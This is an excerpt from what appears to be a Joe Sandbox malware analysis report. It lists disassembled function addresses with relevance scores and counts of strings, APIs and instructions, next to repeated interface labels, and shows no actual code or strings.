Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680C178 Relevance: .6, Instructions: 635COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680ACB0 Relevance: 10.4, Strings: 8, Instructions: 393COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06809138 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680CF30 Relevance: 4.6, Strings: 3, Instructions: 804COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06804B58 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06809127 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06804B49 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 029FEA28 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F21F3 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F21F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F5B74 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F5DE0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F5DE8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F9783 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 029FE190 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 029FEAF8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F0118 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F114B Relevance: 1.6, APIs: 1, Instructions: 50COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F6C59 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F6C5C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F6A24 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F73A8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F7871 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680DAA5 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680DAB8 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068021BD Relevance: 1.4, Strings: 1, Instructions: 108COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068021D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680B208 Relevance: .3, Instructions: 298COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068061D8 Relevance: .2, Instructions: 229COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06804289 Relevance: .2, Instructions: 221COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068045A8 Relevance: .2, Instructions: 220COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06804298 Relevance: .2, Instructions: 218COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068045C0 Relevance: .2, Instructions: 210COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680EB00 Relevance: .2, Instructions: 209COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680EB10 Relevance: .2, Instructions: 201COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680FBB0 Relevance: .2, Instructions: 171COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680F951 Relevance: .2, Instructions: 171COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680F960 Relevance: .2, Instructions: 163COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06805410 Relevance: .1, Instructions: 126COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680FBA0 Relevance: .1, Instructions: 108COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06802080 Relevance: .1, Instructions: 95COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06802090 Relevance: .1, Instructions: 91COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06803A88 Relevance: .1, Instructions: 83COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06803A98 Relevance: .1, Instructions: 78COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0111D030 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0111D1F8 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0111D3A8 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06806D00 Relevance: .1, Instructions: 68COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06805401 Relevance: .1, Instructions: 67COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06803BA8 Relevance: .1, Instructions: 59COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068041E8 Relevance: .1, Instructions: 58COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06803B98 Relevance: .1, Instructions: 57COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06803860 Relevance: .1, Instructions: 55COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680ED80 Relevance: .1, Instructions: 55COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680A2E9 Relevance: .1, Instructions: 54COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0111D1F3 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0111D3A3 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0111D02B Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06803048 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06803868 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068041F8 Relevance: .1, Instructions: 51COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680ED90 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680A2F8 Relevance: .0, Instructions: 46COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680C7C0 Relevance: .0, Instructions: 33COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06806458 Relevance: .0, Instructions: 31COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06806468 Relevance: .0, Instructions: 22COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06807688 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680A918 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06807088 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068083C0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068087D8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680ACA3 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|